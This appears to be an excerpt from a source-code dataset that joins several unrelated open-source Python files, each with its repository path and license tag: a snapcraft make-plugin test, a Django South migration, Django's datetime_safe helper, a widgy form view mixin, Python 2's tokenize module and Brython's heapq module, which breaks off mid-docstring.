binary_output = self.get_output_ignoring_non_zero_exit(
os.path.join('stage', 'bin', 'test'),
cwd=project_dir)
self.assertEqual('Hello world\n', binary_output)
def test_clean_make_plugin(self):
project_dir = 'simple-make'
self.run_snapcraft('snap', project_dir)
snap_dirs = ('stage', 'parts', 'prime')
for dir_ in snap_dirs:
self.assertThat(
os.path.join(project_dir, dir_), DirExists())
self.run_snapcraft('clean', project_dir)
for dir_ in snap_dirs:
self.assertThat(
os.path.join(project_dir, dir_), Not(DirExists()))
def test_nonstandard_makefile(self):
project_dir = 'simple-make-nonstandard-makefile'
self.run_snapcraft('stage', project_dir)
binary_output = self.get_output_ignoring_non_zero_exit(
os.path.join('stage', 'bin', 'test'),
cwd=project_dir)
self.assertEqual('Hello world\n', binary_output)
def test_stage_make_with_artifacts(self):
project_dir = 'simple-make-artifacts'
self.run_snapcraft('stage', project_dir)
binary_output = self.get_output_ignoring_non_zero_exit(
os.path.join('stage', 'test'),
cwd=project_dir)
self.assertEqual('Hello World!\n', binary_output)
| gpl-3.0 |
gustavomazevedo/tbackup-client | client/migrations/0009_auto__add_field_backup_origin__chg_field_backup_remote_id.py | 1 | 4529 | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Backup.origin'
db.add_column(u'client_backup', 'origin',
self.gf('django.db.models.fields.CharField')(max_length=256, null=True, blank=True),
keep_default=False)
# Changing field 'Backup.remote_id'
db.alter_column(u'client_backup', 'remote_id', self.gf('django.db.models.fields.BigIntegerField')(null=True))
def backwards(self, orm):
# Deleting field 'Backup.origin'
db.delete_column(u'client_backup', 'origin')
# Changing field 'Backup.remote_id'
db.alter_column(u'client_backup', 'remote_id', self.gf('django.db.models.fields.BigIntegerField')(default=0))
models = {
'client.backup': {
'Meta': {'object_name': 'Backup'},
'destination': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True', 'blank': 'True'}),
'file': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_error': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
'origin': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True', 'blank': 'True'}),
'remote_backup_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'remote_id': ('django.db.models.fields.BigIntegerField', [], {'null': 'True', 'blank': 'True'}),
'schedule': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['client.Schedule']"})
},
'client.oplog': {
'Meta': {'object_name': 'OpLog'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'client.origin': {
'Meta': {'object_name': 'Origin'},
'auth_token': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'null': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '1024'}),
'remote_id': ('django.db.models.fields.BigIntegerField', [], {})
},
'client.rrule': {
'Meta': {'object_name': 'RRule'},
'description': ('django.db.models.fields.TextField', [], {}),
'frequency': ('django.db.models.fields.CharField', [], {'max_length': '10'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'params': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'})
},
'client.schedule': {
'Meta': {'object_name': 'Schedule'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'destination': ('django.db.models.fields.CharField', [], {'max_length': '1024'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'initial_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2014, 11, 27, 0, 0)'}),
'rule': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['client.RRule']", 'null': 'True', 'blank': 'True'})
},
'client.webserver': {
'Meta': {'object_name': 'WebServer'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'api_root': ('django.db.models.fields.CharField', [], {'max_length': '1024'}),
'creation_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '80'}),
'url': ('django.db.models.fields.CharField', [], {'max_length': '1024'})
}
}
complete_apps = ['client'] | mit |
makacodewalker/etsgh | django/utils/datetime_safe.py | 496 | 2685 | # Python's datetime strftime doesn't handle dates before 1900.
# These classes override date and datetime to support the formatting of a date
# through its full "proleptic Gregorian" date range.
#
# Based on code submitted to comp.lang.python by Andrew Dalke
#
# >>> datetime_safe.date(1850, 8, 2).strftime("%Y/%m/%d was a %A")
# '1850/08/02 was a Friday'
from datetime import date as real_date, datetime as real_datetime
import re
import time
class date(real_date):
def strftime(self, fmt):
return strftime(self, fmt)
class datetime(real_datetime):
def strftime(self, fmt):
return strftime(self, fmt)
def combine(self, date, time):
return datetime(date.year, date.month, date.day, time.hour, time.minute, time.microsecond, time.tzinfo)
def date(self):
return date(self.year, self.month, self.day)
def new_date(d):
"Generate a safe date from a datetime.date object."
return date(d.year, d.month, d.day)
def new_datetime(d):
"""
Generate a safe datetime from a datetime.date or datetime.datetime object.
"""
kw = [d.year, d.month, d.day]
if isinstance(d, real_datetime):
kw.extend([d.hour, d.minute, d.second, d.microsecond, d.tzinfo])
return datetime(*kw)
# This library does not support strftime's "%s" or "%y" format strings.
# Allowed if there's an even number of "%"s because they are escaped.
_illegal_formatting = re.compile(r"((^|[^%])(%%)*%[sy])")
def _findall(text, substr):
# Also finds overlaps
sites = []
i = 0
while 1:
j = text.find(substr, i)
if j == -1:
break
sites.append(j)
i=j+1
return sites
def strftime(dt, fmt):
if dt.year >= 1900:
return super(type(dt), dt).strftime(fmt)
illegal_formatting = _illegal_formatting.search(fmt)
if illegal_formatting:
raise TypeError("strftime of dates before 1900 does not handle" + illegal_formatting.group(0))
year = dt.year
# For every non-leap year century, advance by
# 6 years to get into the 28-year repeat cycle
delta = 2000 - year
off = 6 * (delta // 100 + delta // 400)
year = year + off
# Move to around the year 2000
year = year + ((2000 - year) // 28) * 28
timetuple = dt.timetuple()
s1 = time.strftime(fmt, (year,) + timetuple[1:])
sites1 = _findall(s1, str(year))
s2 = time.strftime(fmt, (year+28,) + timetuple[1:])
sites2 = _findall(s2, str(year+28))
sites = []
for site in sites1:
if site in sites2:
sites.append(site)
s = s1
syear = "%04d" % (dt.year,)
for site in sites:
s = s[:site] + syear + s[site+4:]
return s
| bsd-3-clause |
j00bar/django-widgy | widgy/contrib/form_builder/views.py | 1 | 1271 | from django.views.generic.edit import FormMixin
from django.shortcuts import get_object_or_404
from widgy.models import Node
class HandleFormMixin(FormMixin):
"""
An abstract view mixin for handling form_builder.Form submissions.
"""
def post(self, *args, **kwargs):
"""
copied from django.views.generic.edit.ProcessFormView, because we want
the post method, but not the get method.
"""
form_class = self.get_form_class()
form = self.get_form(form_class)
if form.is_valid():
return self.form_valid(form)
else:
return self.form_invalid(form)
put = post
def get_form_node(self):
node = get_object_or_404(Node, pk=self.kwargs['form_node_pk'])
node.prefetch_tree()
return node
def get_form_class(self):
self.form_node = self.get_form_node()
return self.form_node.content.build_form_class()
def get_context_data(self, **kwargs):
if 'form' in kwargs:
kwargs.setdefault(self.form_node.content.context_var, kwargs['form'])
return super(HandleFormMixin, self).get_context_data(**kwargs)
def form_valid(self, form):
return self.form_node.content.execute(self.request, form)
| apache-2.0 |
fighterCui/L4ReFiascoOC | l4/pkg/python/contrib/Lib/tokenize.py | 62 | 16326 | """Tokenization help for Python programs.
generate_tokens(readline) is a generator that breaks a stream of
text into Python tokens. It accepts a readline-like method which is called
repeatedly to get the next line of input (or "" for EOF). It generates
5-tuples with these members:
the token type (see token.py)
the token (a string)
the starting (row, column) indices of the token (a 2-tuple of ints)
the ending (row, column) indices of the token (a 2-tuple of ints)
the original line (string)
It is designed to match the working of the Python tokenizer exactly, except
that it produces COMMENT tokens for comments and gives type OP for all
operators
Older entry points
tokenize_loop(readline, tokeneater)
tokenize(readline, tokeneater=printtoken)
are the same, except instead of generating tokens, tokeneater is a callback
function to which the 5 fields described above are passed as 5 arguments,
each time a new token is found."""
__author__ = 'Ka-Ping Yee <[email protected]>'
__credits__ = \
'GvR, ESR, Tim Peters, Thomas Wouters, Fred Drake, Skip Montanaro, Raymond Hettinger'
import string, re
from token import *
import token
__all__ = [x for x in dir(token) if x[0] != '_'] + ["COMMENT", "tokenize",
"generate_tokens", "NL", "untokenize"]
del x
del token
COMMENT = N_TOKENS
tok_name[COMMENT] = 'COMMENT'
NL = N_TOKENS + 1
tok_name[NL] = 'NL'
N_TOKENS += 2
def group(*choices): return '(' + '|'.join(choices) + ')'
def any(*choices): return group(*choices) + '*'
def maybe(*choices): return group(*choices) + '?'
Whitespace = r'[ \f\t]*'
Comment = r'#[^\r\n]*'
Ignore = Whitespace + any(r'\\\r?\n' + Whitespace) + maybe(Comment)
Name = r'[a-zA-Z_]\w*'
Hexnumber = r'0[xX][\da-fA-F]+[lL]?'
Octnumber = r'(0[oO][0-7]+)|(0[0-7]*)[lL]?'
Binnumber = r'0[bB][01]+[lL]?'
Decnumber = r'[1-9]\d*[lL]?'
Intnumber = group(Hexnumber, Binnumber, Octnumber, Decnumber)
Exponent = r'[eE][-+]?\d+'
Pointfloat = group(r'\d+\.\d*', r'\.\d+') + maybe(Exponent)
Expfloat = r'\d+' + Exponent
Floatnumber = group(Pointfloat, Expfloat)
Imagnumber = group(r'\d+[jJ]', Floatnumber + r'[jJ]')
Number = group(Imagnumber, Floatnumber, Intnumber)
# Tail end of ' string.
Single = r"[^'\\]*(?:\\.[^'\\]*)*'"
# Tail end of " string.
Double = r'[^"\\]*(?:\\.[^"\\]*)*"'
# Tail end of ''' string.
Single3 = r"[^'\\]*(?:(?:\\.|'(?!''))[^'\\]*)*'''"
# Tail end of """ string.
Double3 = r'[^"\\]*(?:(?:\\.|"(?!""))[^"\\]*)*"""'
Triple = group("[uU]?[rR]?'''", '[uU]?[rR]?"""')
# Single-line ' or " string.
String = group(r"[uU]?[rR]?'[^\n'\\]*(?:\\.[^\n'\\]*)*'",
r'[uU]?[rR]?"[^\n"\\]*(?:\\.[^\n"\\]*)*"')
# Because of leftmost-then-longest match semantics, be sure to put the
# longest operators first (e.g., if = came before ==, == would get
# recognized as two instances of =).
Operator = group(r"\*\*=?", r">>=?", r"<<=?", r"<>", r"!=",
r"//=?",
r"[+\-*/%&|^=<>]=?",
r"~")
Bracket = '[][(){}]'
Special = group(r'\r?\n', r'[:;.,`@]')
Funny = group(Operator, Bracket, Special)
PlainToken = group(Number, Funny, String, Name)
Token = Ignore + PlainToken
# First (or only) line of ' or " string.
ContStr = group(r"[uU]?[rR]?'[^\n'\\]*(?:\\.[^\n'\\]*)*" +
group("'", r'\\\r?\n'),
r'[uU]?[rR]?"[^\n"\\]*(?:\\.[^\n"\\]*)*' +
group('"', r'\\\r?\n'))
PseudoExtras = group(r'\\\r?\n', Comment, Triple)
PseudoToken = Whitespace + group(PseudoExtras, Number, Funny, ContStr, Name)
tokenprog, pseudoprog, single3prog, double3prog = map(
re.compile, (Token, PseudoToken, Single3, Double3))
endprogs = {"'": re.compile(Single), '"': re.compile(Double),
"'''": single3prog, '"""': double3prog,
"r'''": single3prog, 'r"""': double3prog,
"u'''": single3prog, 'u"""': double3prog,
"ur'''": single3prog, 'ur"""': double3prog,
"R'''": single3prog, 'R"""': double3prog,
"U'''": single3prog, 'U"""': double3prog,
"uR'''": single3prog, 'uR"""': double3prog,
"Ur'''": single3prog, 'Ur"""': double3prog,
"UR'''": single3prog, 'UR"""': double3prog,
"b'''": single3prog, 'b"""': double3prog,
"br'''": single3prog, 'br"""': double3prog,
"B'''": single3prog, 'B"""': double3prog,
"bR'''": single3prog, 'bR"""': double3prog,
"Br'''": single3prog, 'Br"""': double3prog,
"BR'''": single3prog, 'BR"""': double3prog,
'r': None, 'R': None, 'u': None, 'U': None,
'b': None, 'B': None}
triple_quoted = {}
for t in ("'''", '"""',
"r'''", 'r"""', "R'''", 'R"""',
"u'''", 'u"""', "U'''", 'U"""',
"ur'''", 'ur"""', "Ur'''", 'Ur"""',
"uR'''", 'uR"""', "UR'''", 'UR"""',
"b'''", 'b"""', "B'''", 'B"""',
"br'''", 'br"""', "Br'''", 'Br"""',
"bR'''", 'bR"""', "BR'''", 'BR"""'):
triple_quoted[t] = t
single_quoted = {}
for t in ("'", '"',
"r'", 'r"', "R'", 'R"',
"u'", 'u"', "U'", 'U"',
"ur'", 'ur"', "Ur'", 'Ur"',
"uR'", 'uR"', "UR'", 'UR"',
"b'", 'b"', "B'", 'B"',
"br'", 'br"', "Br'", 'Br"',
"bR'", 'bR"', "BR'", 'BR"' ):
single_quoted[t] = t
tabsize = 8
class TokenError(Exception): pass
class StopTokenizing(Exception): pass
def printtoken(type, token, srow_scol, erow_ecol, line): # for testing
srow, scol = srow_scol
erow, ecol = erow_ecol
print "%d,%d-%d,%d:\t%s\t%s" % \
(srow, scol, erow, ecol, tok_name[type], repr(token))
def tokenize(readline, tokeneater=printtoken):
"""
The tokenize() function accepts two parameters: one representing the
input stream, and one providing an output mechanism for tokenize().
The first parameter, readline, must be a callable object which provides
the same interface as the readline() method of built-in file objects.
Each call to the function should return one line of input as a string.
The second parameter, tokeneater, must also be a callable object. It is
called once for each token, with five arguments, corresponding to the
tuples generated by generate_tokens().
"""
try:
tokenize_loop(readline, tokeneater)
except StopTokenizing:
pass
# backwards compatible interface
def tokenize_loop(readline, tokeneater):
for token_info in generate_tokens(readline):
tokeneater(*token_info)
class Untokenizer:
def __init__(self):
self.tokens = []
self.prev_row = 1
self.prev_col = 0
def add_whitespace(self, start):
row, col = start
assert row <= self.prev_row
col_offset = col - self.prev_col
if col_offset:
self.tokens.append(" " * col_offset)
def untokenize(self, iterable):
for t in iterable:
if len(t) == 2:
self.compat(t, iterable)
break
tok_type, token, start, end, line = t
self.add_whitespace(start)
self.tokens.append(token)
self.prev_row, self.prev_col = end
if tok_type in (NEWLINE, NL):
self.prev_row += 1
self.prev_col = 0
return "".join(self.tokens)
def compat(self, token, iterable):
startline = False
indents = []
toks_append = self.tokens.append
toknum, tokval = token
if toknum in (NAME, NUMBER):
tokval += ' '
if toknum in (NEWLINE, NL):
startline = True
prevstring = False
for tok in iterable:
toknum, tokval = tok[:2]
if toknum in (NAME, NUMBER):
tokval += ' '
# Insert a space between two consecutive strings
if toknum == STRING:
if prevstring:
tokval = ' ' + tokval
prevstring = True
else:
prevstring = False
if toknum == INDENT:
indents.append(tokval)
continue
elif toknum == DEDENT:
indents.pop()
continue
elif toknum in (NEWLINE, NL):
startline = True
elif startline and indents:
toks_append(indents[-1])
startline = False
toks_append(tokval)
def untokenize(iterable):
"""Transform tokens back into Python source code.
Each element returned by the iterable must be a token sequence
with at least two elements, a token number and token value. If
only two tokens are passed, the resulting output is poor.
Round-trip invariant for full input:
Untokenized source will match input source exactly
Round-trip invariant for limited intput:
# Output text will tokenize the back to the input
t1 = [tok[:2] for tok in generate_tokens(f.readline)]
newcode = untokenize(t1)
readline = iter(newcode.splitlines(1)).next
t2 = [tok[:2] for tok in generate_tokens(readline)]
assert t1 == t2
"""
ut = Untokenizer()
return ut.untokenize(iterable)
def generate_tokens(readline):
"""
The generate_tokens() generator requires one argment, readline, which
must be a callable object which provides the same interface as the
readline() method of built-in file objects. Each call to the function
should return one line of input as a string. Alternately, readline
can be a callable function terminating with StopIteration:
readline = open(myfile).next # Example of alternate readline
The generator produces 5-tuples with these members: the token type; the
token string; a 2-tuple (srow, scol) of ints specifying the row and
column where the token begins in the source; a 2-tuple (erow, ecol) of
ints specifying the row and column where the token ends in the source;
and the line on which the token was found. The line passed is the
logical line; continuation lines are included.
"""
lnum = parenlev = continued = 0
namechars, numchars = string.ascii_letters + '_', '0123456789'
contstr, needcont = '', 0
contline = None
indents = [0]
while 1: # loop over lines in stream
try:
line = readline()
except StopIteration:
line = ''
lnum = lnum + 1
pos, max = 0, len(line)
if contstr: # continued string
if not line:
raise TokenError, ("EOF in multi-line string", strstart)
endmatch = endprog.match(line)
if endmatch:
pos = end = endmatch.end(0)
yield (STRING, contstr + line[:end],
strstart, (lnum, end), contline + line)
contstr, needcont = '', 0
contline = None
elif needcont and line[-2:] != '\\\n' and line[-3:] != '\\\r\n':
yield (ERRORTOKEN, contstr + line,
strstart, (lnum, len(line)), contline)
contstr = ''
contline = None
continue
else:
contstr = contstr + line
contline = contline + line
continue
elif parenlev == 0 and not continued: # new statement
if not line: break
column = 0
while pos < max: # measure leading whitespace
if line[pos] == ' ': column = column + 1
elif line[pos] == '\t': column = (column/tabsize + 1)*tabsize
elif line[pos] == '\f': column = 0
else: break
pos = pos + 1
if pos == max: break
if line[pos] in '#\r\n': # skip comments or blank lines
if line[pos] == '#':
comment_token = line[pos:].rstrip('\r\n')
nl_pos = pos + len(comment_token)
yield (COMMENT, comment_token,
(lnum, pos), (lnum, pos + len(comment_token)), line)
yield (NL, line[nl_pos:],
(lnum, nl_pos), (lnum, len(line)), line)
else:
yield ((NL, COMMENT)[line[pos] == '#'], line[pos:],
(lnum, pos), (lnum, len(line)), line)
continue
if column > indents[-1]: # count indents or dedents
indents.append(column)
yield (INDENT, line[:pos], (lnum, 0), (lnum, pos), line)
while column < indents[-1]:
if column not in indents:
raise IndentationError(
"unindent does not match any outer indentation level",
("<tokenize>", lnum, pos, line))
indents = indents[:-1]
yield (DEDENT, '', (lnum, pos), (lnum, pos), line)
else: # continued statement
if not line:
raise TokenError, ("EOF in multi-line statement", (lnum, 0))
continued = 0
while pos < max:
pseudomatch = pseudoprog.match(line, pos)
if pseudomatch: # scan for tokens
start, end = pseudomatch.span(1)
spos, epos, pos = (lnum, start), (lnum, end), end
token, initial = line[start:end], line[start]
if initial in numchars or \
(initial == '.' and token != '.'): # ordinary number
yield (NUMBER, token, spos, epos, line)
elif initial in '\r\n':
yield (NL if parenlev > 0 else NEWLINE,
token, spos, epos, line)
elif initial == '#':
assert not token.endswith("\n")
yield (COMMENT, token, spos, epos, line)
elif token in triple_quoted:
endprog = endprogs[token]
endmatch = endprog.match(line, pos)
if endmatch: # all on one line
pos = endmatch.end(0)
token = line[start:pos]
yield (STRING, token, spos, (lnum, pos), line)
else:
strstart = (lnum, start) # multiple lines
contstr = line[start:]
contline = line
break
elif initial in single_quoted or \
token[:2] in single_quoted or \
token[:3] in single_quoted:
if token[-1] == '\n': # continued string
strstart = (lnum, start)
endprog = (endprogs[initial] or endprogs[token[1]] or
endprogs[token[2]])
contstr, needcont = line[start:], 1
contline = line
break
else: # ordinary string
yield (STRING, token, spos, epos, line)
elif initial in namechars: # ordinary name
yield (NAME, token, spos, epos, line)
elif initial == '\\': # continued stmt
continued = 1
else:
if initial in '([{': parenlev = parenlev + 1
elif initial in ')]}': parenlev = parenlev - 1
yield (OP, token, spos, epos, line)
else:
yield (ERRORTOKEN, line[pos],
(lnum, pos), (lnum, pos+1), line)
pos = pos + 1
for indent in indents[1:]: # pop remaining indent levels
yield (DEDENT, '', (lnum, 0), (lnum, 0), '')
yield (ENDMARKER, '', (lnum, 0), (lnum, 0), '')
if __name__ == '__main__': # testing
import sys
if len(sys.argv) > 1: tokenize(open(sys.argv[1]).readline)
else: tokenize(sys.stdin.readline)
| gpl-2.0 |
Jionglun/-w16b_test | static/Brython3.1.3-20150514-095342/Lib/heapq.py | 628 | 18065 | """Heap queue algorithm (a.k.a. priority queue).
Heaps are arrays for which a[k] <= a[2*k+1] and a[k] <= a[2*k+2] for
all k, counting elements from 0. For the sake of comparison,
non-existing elements are considered to be infinite. The interesting
property of a heap is that a[0] is always its smallest element.
Usage:
heap = [] # creates an empty heap
heappush(heap, item) # pushes a new item on the heap
item = heappop(heap) # pops the smallest item from the heap
item = heap[0] # smallest item on the heap without popping it
heapify(x) # transforms list into a heap, in-place, in linear time
item = heapreplace(heap, item) # pops and returns smallest item, and adds
# new item; the heap size is unchanged
Our API differs from textbook heap algorithms as follows:
- We use 0-based indexing. This makes the relationship between the
index for a node and the indexes for its children slightly less
obvious, but is more suitable since Python uses 0-based indexing.
- Our heappop() method returns the smallest item, not the largest.
These two make it possible to view the heap as a regular Python list
without surprises: heap[0] is the smallest item, and heap.sort()
maintains the heap invariant!
"""
# Original code by Kevin O'Connor, augmented by Tim Peters and Raymond Hettinger
__about__ = """Heap queues
[explanation by François Pinard]
Heaps are arrays for which a[k] <= a[2*k+1] and a[k] <= a[2*k+2] for
all k, counting elements from 0. For the sake of comparison,
non-existing elements are considered to be infinite. The interesting
property of a heap is that a[0] is always its smallest element.
The strange invariant above is meant to be an efficient memory
representation for a tournament. The numbers below are `k', not a[k]:
0
1 2
3 4 5 6
7 8 9 10 11 12 13 14
15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30
In the tree above, each cell `k' is topping `2*k+1' and `2*k+2'. In
an usual binary tournament we see in sports, each cell is the winner
over the two cells it tops, and we can trace the winner down the tree
to see all opponents s/he had. However, in many computer applications
of such tournaments, we do not need to trace the history of a winner.
To be more memory efficient, when a winner is promoted, we try to
replace it by something else at a lower level, and the rule becomes
that a cell and the two cells it tops contain three different items,
but the top cell "wins" over the two topped cells.
If this heap invariant is protected at all time, index 0 is clearly
the overall winner. The simplest algorithmic way to remove it and
find the "next" winner is to move some loser (let's say cell 30 in the
diagram above) into the 0 position, and then percolate this new 0 down
the tree, exchanging values, until the invariant is re-established.
This is clearly logarithmic on the total number of items in the tree.
By iterating over all items, you get an O(n ln n) sort.
A nice feature of this sort is that you can efficiently insert new
items while the sort is going on, provided that the inserted items are
not "better" than the last 0'th element you extracted. This is
especially useful in simulation contexts, where the tree holds all
incoming events, and the "win" condition means the smallest scheduled
time. When an event schedule other events for execution, they are
scheduled into the future, so they can easily go into the heap. So, a
heap is a good structure for implementing schedulers (this is what I
used for my MIDI sequencer :-).
Various structures for implementing schedulers have been extensively
studied, and heaps are good for this, as they are reasonably speedy,
the speed is almost constant, and the worst case is not much different
than the average case. However, there are other representations which
are more efficient overall, yet the worst cases might be terrible.
Heaps are also very useful in big disk sorts. You most probably all
know that a big sort implies producing "runs" (which are pre-sorted
sequences, which size is usually related to the amount of CPU memory),
followed by a merging passes for these runs, which merging is often
very cleverly organised[1]. It is very important that the initial
sort produces the longest runs possible. Tournaments are a good way
to that. If, using all the memory available to hold a tournament, you
replace and percolate items that happen to fit the current run, you'll
produce runs which are twice the size of the memory for random input,
and much better for input fuzzily ordered.
Moreover, if you output the 0'th item on disk and get an input which
may not fit in the current tournament (because the value "wins" over
the last output value), it cannot fit in the heap, so the size of the
heap decreases. The freed memory could be cleverly reused immediately
for progressively building a second heap, which grows at exactly the
same rate the first heap is melting. When the first heap completely
vanishes, you switch heaps and start a new run. Clever and quite
effective!
In a word, heaps are useful memory structures to know. I use them in
a few applications, and I think it is good to keep a `heap' module
around. :-)
--------------------
[1] The disk balancing algorithms which are current, nowadays, are
more annoying than clever, and this is a consequence of the seeking
capabilities of the disks. On devices which cannot seek, like big
tape drives, the story was quite different, and one had to be very
clever to ensure (far in advance) that each tape movement will be the
most effective possible (that is, will best participate at
"progressing" the merge). Some tapes were even able to read
backwards, and this was also used to avoid the rewinding time.
Believe me, real good tape sorts were quite spectacular to watch!
From all times, sorting has always been a Great Art! :-)
"""
__all__ = ['heappush', 'heappop', 'heapify', 'heapreplace', 'merge',
'nlargest', 'nsmallest', 'heappushpop']
from itertools import islice, count, tee, chain
def heappush(heap, item):
"""Push item onto heap, maintaining the heap invariant."""
heap.append(item)
_siftdown(heap, 0, len(heap)-1)
def heappop(heap):
"""Pop the smallest item off the heap, maintaining the heap invariant."""
lastelt = heap.pop() # raises appropriate IndexError if heap is empty
if heap:
returnitem = heap[0]
heap[0] = lastelt
_siftup(heap, 0)
else:
returnitem = lastelt
return returnitem
def heapreplace(heap, item):
"""Pop and return the current smallest value, and add the new item.
This is more efficient than heappop() followed by heappush(), and can be
more appropriate when using a fixed-size heap. Note that the value
returned may be larger than item! That constrains reasonable uses of
this routine unless written as part of a conditional replacement:
if item > heap[0]:
item = heapreplace(heap, item)
"""
returnitem = heap[0] # raises appropriate IndexError if heap is empty
heap[0] = item
_siftup(heap, 0)
return returnitem
def heappushpop(heap, item):
"""Fast version of a heappush followed by a heappop."""
if heap and heap[0] < item:
item, heap[0] = heap[0], item
_siftup(heap, 0)
return item
def heapify(x):
"""Transform list into a heap, in-place, in O(len(x)) time."""
n = len(x)
# Transform bottom-up. The largest index there's any point to looking at
# is the largest with a child index in-range, so must have 2*i + 1 < n,
# or i < (n-1)/2. If n is even = 2*j, this is (2*j-1)/2 = j-1/2 so
# j-1 is the largest, which is n//2 - 1. If n is odd = 2*j+1, this is
# (2*j+1-1)/2 = j so j-1 is the largest, and that's again n//2-1.
for i in reversed(range(n//2)):
_siftup(x, i)
def _heappushpop_max(heap, item):
"""Maxheap version of a heappush followed by a heappop."""
if heap and item < heap[0]:
item, heap[0] = heap[0], item
_siftup_max(heap, 0)
return item
def _heapify_max(x):
"""Transform list into a maxheap, in-place, in O(len(x)) time."""
n = len(x)
for i in reversed(range(n//2)):
_siftup_max(x, i)
def nlargest(n, iterable):
"""Find the n largest elements in a dataset.
Equivalent to: sorted(iterable, reverse=True)[:n]
"""
if n < 0:
return []
it = iter(iterable)
result = list(islice(it, n))
if not result:
return result
heapify(result)
_heappushpop = heappushpop
for elem in it:
_heappushpop(result, elem)
result.sort(reverse=True)
return result
def nsmallest(n, iterable):
"""Find the n smallest elements in a dataset.
Equivalent to: sorted(iterable)[:n]
"""
if n < 0:
return []
it = iter(iterable)
result = list(islice(it, n))
if not result:
return result
_heapify_max(result)
_heappushpop = _heappushpop_max
for elem in it:
_heappushpop(result, elem)
result.sort()
return result
# 'heap' is a heap at all indices >= startpos, except possibly for pos. pos
# is the index of a leaf with a possibly out-of-order value. Restore the
# heap invariant.
def _siftdown(heap, startpos, pos):
newitem = heap[pos]
# Follow the path to the root, moving parents down until finding a place
# newitem fits.
while pos > startpos:
parentpos = (pos - 1) >> 1
parent = heap[parentpos]
if newitem < parent:
heap[pos] = parent
pos = parentpos
continue
break
heap[pos] = newitem
# The child indices of heap index pos are already heaps, and we want to make
# a heap at index pos too. We do this by bubbling the smaller child of
# pos up (and so on with that child's children, etc) until hitting a leaf,
# then using _siftdown to move the oddball originally at index pos into place.
#
# We *could* break out of the loop as soon as we find a pos where newitem <=
# both its children, but turns out that's not a good idea, and despite that
# many books write the algorithm that way. During a heap pop, the last array
# element is sifted in, and that tends to be large, so that comparing it
# against values starting from the root usually doesn't pay (= usually doesn't
# get us out of the loop early). See Knuth, Volume 3, where this is
# explained and quantified in an exercise.
#
# Cutting the # of comparisons is important, since these routines have no
# way to extract "the priority" from an array element, so that intelligence
# is likely to be hiding in custom comparison methods, or in array elements
# storing (priority, record) tuples. Comparisons are thus potentially
# expensive.
#
# On random arrays of length 1000, making this change cut the number of
# comparisons made by heapify() a little, and those made by exhaustive
# heappop() a lot, in accord with theory. Here are typical results from 3
# runs (3 just to demonstrate how small the variance is):
#
# Compares needed by heapify Compares needed by 1000 heappops
# -------------------------- --------------------------------
# 1837 cut to 1663 14996 cut to 8680
# 1855 cut to 1659 14966 cut to 8678
# 1847 cut to 1660 15024 cut to 8703
#
# Building the heap by using heappush() 1000 times instead required
# 2198, 2148, and 2219 compares: heapify() is more efficient, when
# you can use it.
#
# The total compares needed by list.sort() on the same lists were 8627,
# 8627, and 8632 (this should be compared to the sum of heapify() and
# heappop() compares): list.sort() is (unsurprisingly!) more efficient
# for sorting.
def _siftup(heap, pos):
endpos = len(heap)
startpos = pos
newitem = heap[pos]
# Bubble up the smaller child until hitting a leaf.
childpos = 2*pos + 1 # leftmost child position
while childpos < endpos:
# Set childpos to index of smaller child.
rightpos = childpos + 1
if rightpos < endpos and not heap[childpos] < heap[rightpos]:
childpos = rightpos
# Move the smaller child up.
heap[pos] = heap[childpos]
pos = childpos
childpos = 2*pos + 1
# The leaf at pos is empty now. Put newitem there, and bubble it up
# to its final resting place (by sifting its parents down).
heap[pos] = newitem
_siftdown(heap, startpos, pos)
def _siftdown_max(heap, startpos, pos):
'Maxheap variant of _siftdown'
newitem = heap[pos]
# Follow the path to the root, moving parents down until finding a place
# newitem fits.
while pos > startpos:
parentpos = (pos - 1) >> 1
parent = heap[parentpos]
if parent < newitem:
heap[pos] = parent
pos = parentpos
continue
break
heap[pos] = newitem
def _siftup_max(heap, pos):
'Maxheap variant of _siftup'
endpos = len(heap)
startpos = pos
newitem = heap[pos]
# Bubble up the larger child until hitting a leaf.
childpos = 2*pos + 1 # leftmost child position
while childpos < endpos:
# Set childpos to index of larger child.
rightpos = childpos + 1
if rightpos < endpos and not heap[rightpos] < heap[childpos]:
childpos = rightpos
# Move the larger child up.
heap[pos] = heap[childpos]
pos = childpos
childpos = 2*pos + 1
# The leaf at pos is empty now. Put newitem there, and bubble it up
# to its final resting place (by sifting its parents down).
heap[pos] = newitem
_siftdown_max(heap, startpos, pos)
# If available, use C implementation
#_heapq does not exist in brython, so lets just comment it out.
#try:
# from _heapq import *
#except ImportError:
# pass
def merge(*iterables):
'''Merge multiple sorted inputs into a single sorted output.
Similar to sorted(itertools.chain(*iterables)) but returns a generator,
does not pull the data into memory all at once, and assumes that each of
the input streams is already sorted (smallest to largest).
